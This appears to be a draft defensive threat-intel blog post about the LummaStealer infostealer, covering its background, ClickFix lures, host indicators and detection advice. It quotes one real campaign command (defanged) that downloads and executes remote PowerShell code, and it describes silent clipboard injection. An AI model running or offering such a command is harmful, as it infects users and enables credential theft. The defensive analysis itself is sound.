---
layout: post
title:  "LummaStealer"
date:   2025-06-16 21:00:00 +1000
categories: threat intel
---

<style>
  body { font-size: 13px; }
  h1 { font-size: 19px !important; }
  h2 { font-size: 17px !important; }
  h3 { font-size: 15px !important; }
</style>

### Overview

LummaStealer C++ prominent in-memory infostealer. Malware-as-a-service operation developed by "Shamel".

Lumma has been prominent since 2022 when it first appeared for sale. Up until May 2025 it has been smooth sailing. In May Microsoft blocked 2,300 domains related to Lumma's infra. Furthermore the DOJ seized Lumma's control panel. Microsoft identified that over 390,000 Windows host we're compromised at the time of the blocking. 

Perhaps Lumma's best feature. Is the ability for anyone and everyone to purchase logs that are stolen. So you buy Lumma and you have a direct place to steal the stolen logs. All you have to do is get it on a host in the first place.

(INSERT SCREENSHOT)

### LummaStealer Recent Campaigns
Clickfix is the new phishing. Recent Lumma campaigns have compromised websites and injected malicious code that instructs users to run commands on there host.


An example of a clickfix command used in an actual Lumma campaign is the following
```iwr ct-humancheck[.]info|iex```
Breakdown of flags
- iwr (Invoke Web Request)
- iex (Invoke Expression). Means run code from the prior argument (domain)

Now this paired with a clickfix lure like this

(INSERT SCREENSHOT)

Would be pretty darn tempting. Especially if you we're perhaps paying for something/booking a table/accessing a website. You are just verifying you are human. Right?

The snazzy part about clickfix attacks is that the malicious .js embedded in the website can silently copy commands to your hosts clipboard.

- Function copyToClipboard copies specified command to hosts clipboard
- EventListener triggers copyToClipboard function when user clicks on the page

(INSERT SCREENSHOT)

### LummaStealer IOCs (22nd July 2025)
As LummaStealer is malware-as-a-service each group/individual that purchases Lumma will have there own ways for distributing the software. However, despite this there are some clear initial access TTPs that are consistent with Lumma. Furthermore, Lumma's behaviour when executed is also quite consistent. Although files created may be randomly generated with different hashes and IOCs are unscanned. The processes it chooses to inject in and the directories that it creates files are the same.

Additionally. What makes Lumma and other MaaS operations so expensive is that they guarantee that hash is unrecognisable. Therefore, IOCs are unique to the campaign and quite often the machine. Infrastructure is also provided by Lumma. There are dedicated Lumma C2 servers that people who purchase the malware use to communicate with hosts. These are regularly changing and are managed by Lumma. Because of this, maintaining an updated list of Lumma C2 IOCs is vitally important. Furthermore, creating YARA rules that detect this is even better.

Lastly I'll add that going back and tracking old malware analysis samples and reports for Lumma I observed that the behaviour of the malware changes a lot. Calls different dlls, Windows APIs and uses different compilers. So whilst this might be relevant now, in a day it may not be.

Off track but a person at Mandiant told me they have observed APTs regularly querying VirusTotal to check whether a hash been scanned. As it's often the first step to an investigation, it's a great way to determine whether you've been detected in an environment.

Although Network IOCs are unique to each campaign, I'll still add them in. I'm not certain, but I'm highly confident Lumma would shuffle these regularly.

Host-based IOCs
- Tasklist
- Findstr
- Process injection (Particularly svchost.exe and explorer.exe)
- Masquerading as powershell (e.g. exp.exe)
- Cvtres.exe creating malicious .tmps from the Temp directory in binary code (AppData\Local\Temp)
- Creation of randomly named .exe in Temp directory (Windows\Temp)
- Csc.exe creating malicious .dlls from the Temp directory in binary code (AppData\Local\Temp)
- Csc.exe executing suspicious .cmdline files from the Temp directory (AppData\Local\Temp)
- Startup folder persistence (AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.url)

Here's a list of Lumma Network IOCs from May 2025 provided by Bitsight.
(Bitsight Lumma Stealer Network IOCs)[https://raw.githubusercontent.com/bitsight-research/threat_research/refs/heads/main/lumma/lumma_iocs.csv]

### Data Exfilitration and C2 Channels
Telegram channels.

### How to detect Lumma?
Search for initial access TTPs.
- Clipboard events in EDR logs. Modern EDRs will record these events and often the process that copied to clipboard. 
- Git repos that users have pulled. Process creation events as a result of the command ```git pull``` and ```git clone```. Sort by repo. Biggest to smallest.

But having said all that. Here is some basic techniques to apply to an enterprise network to help detect/prevent Lumma. And all decent malware to be honest.
- SIEM alert for newly registered domains
- SIEM alert for process injection
- SIEM alert for abnormal processes reaching out to external domains
- SIEM alert for abnormal startup processes/reg keys
- Disable powershell for non-administrative users
- Do not whitelist password manager browser extensions
- Disable auto-saving passwords in browser
- Disable downloading exectuables from untrusted websites
- Application whitelisting
- Deploy EDR tools with behavioural analysis capabilities
- Educate users on clickfix attacks and malvertising
- Deploy BDR solution (SquareX)